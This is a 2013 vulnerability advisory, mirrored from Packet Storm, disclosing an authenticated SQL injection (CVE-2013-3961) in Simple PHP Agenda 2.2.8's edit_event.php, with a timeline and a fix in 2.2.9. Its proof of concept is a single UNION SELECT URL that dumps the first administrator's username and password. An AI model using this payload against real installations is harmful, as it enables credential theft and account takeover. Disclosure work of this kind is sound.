Lucene search

K
packetstormAnthony DubuissezPACKETSTORM:121978
HistoryJun 11, 2013 - 12:00 a.m.

Simple PHP Agenda 2.2.8 SQL Injection

2013-06-1100:00:00
Anthony Dubuissez
packetstormsecurity.com
19

EPSS

0.004

Percentile

74.3%

`=============================================  
WEBERA ALERT ADVISORY 02  
- Discovered by: Anthony Dubuissez  
- Severity: high  
- CVE Request – 05/06/2013  
- CVE Assign – 06/06/2013  
- CVE Number – CVE-2013-3961  
- Vendor notification – 06/06/2013  
- Vendor reply – 10/06/2013  
- Public disclosure – 11/06/2013  
=============================================  
  
I. VULNERABILITY β€”β€”β€”β€”β€”β€”β€”β€”-  
iSQL in php-agenda <= 2.2.8  
  
II. BACKGROUND β€”β€”β€”β€”β€”β€”β€”β€”-  
Simple Php Agenda is Β« a simple agenda tool written in PHP with MySQL backend. An agenda tool accessible everywere  
there’s internet Β».  
  
III. DESCRIPTION β€”β€”β€”β€”β€”β€”β€”β€”-  
Php-Agenda 2.2.8 and lower versions contain a flaw that allows an authenticated user iSQL attack. This flaw exists  
because the application does not properly sanitize parameters (only rely on mysql_real_escape_string() funcion ) in the  
edit_event.php file. This allows an attacker to create a specially crafted URL to dump multiple informations of the  
databases content.  
A valid account is required.  
  
IV. PROOF OF CONCEPT β€”β€”β€”β€”β€”β€”β€”β€”-  
dumping login and password of the first admin  
iSQL:  
http://server/edit_event.php?eventid=1%20union%20select%201,2,3,username,password,6,7,8,9%20from%20users%20where%20userlevel=9%20limit%200,1  
  
V. BUSINESS IMPACT β€”β€”β€”β€”β€”β€”β€”β€”-  
iSQL: We can get sensitive information with the vulnerabilities that can escalate to a complete administrator account.  
  
VI. SYSTEMS AFFECTED β€”β€”β€”β€”β€”β€”β€”β€”-  
Php-Agenda 2.2.8 and lower versions  
  
VII. SOLUTION β€”β€”β€”β€”β€”β€”β€”β€”-  
sanitize correctly the GET/POST parameter. (don’t rely on the mysql_real_escape_string() functions only…)  
  
VIII. REFERENCES β€”β€”β€”β€”β€”β€”β€”β€”-  
http://www.webera.fr/advisory-02-php-agenda-isql-exploit/  
  
IX. CREDITS β€”β€”β€”β€”β€”β€”β€”β€”-  
the vulnerability has been discovered by Anthony Dubuissez (anthony (dot) dubuissez (at) webera (dot) fr).  
  
X. DISCLOSURE TIMELINE β€”β€”β€”β€”β€”β€”β€”β€”-  
June 05, 2013: Vulnerability acquired by Webera  
June 06, 2013: Sent to vendor.  
June 10, 2013: Reply of vendor, vendor release bugfix in version 2.2.9  
June 11, 2013: Advisory published and sent to lists.  
  
XI. LEGAL NOTICES β€”β€”β€”β€”β€”β€”β€”β€”-  
The information contained within this advisory is supplied Β« as-is Β» with no warranties or guarantees of fitness of use  
or otherwise.Webera accepts no responsibility for any damage caused by the use or misuse of this information.  
  
XII. FOLLOW US β€”β€”β€”β€”β€”β€”β€”β€”-  
You can follow Webera, news and security advisories at:  
On twitter : @erathemass  
  
`

EPSS

0.004

Percentile

74.3%

Related for PACKETSTORM:121978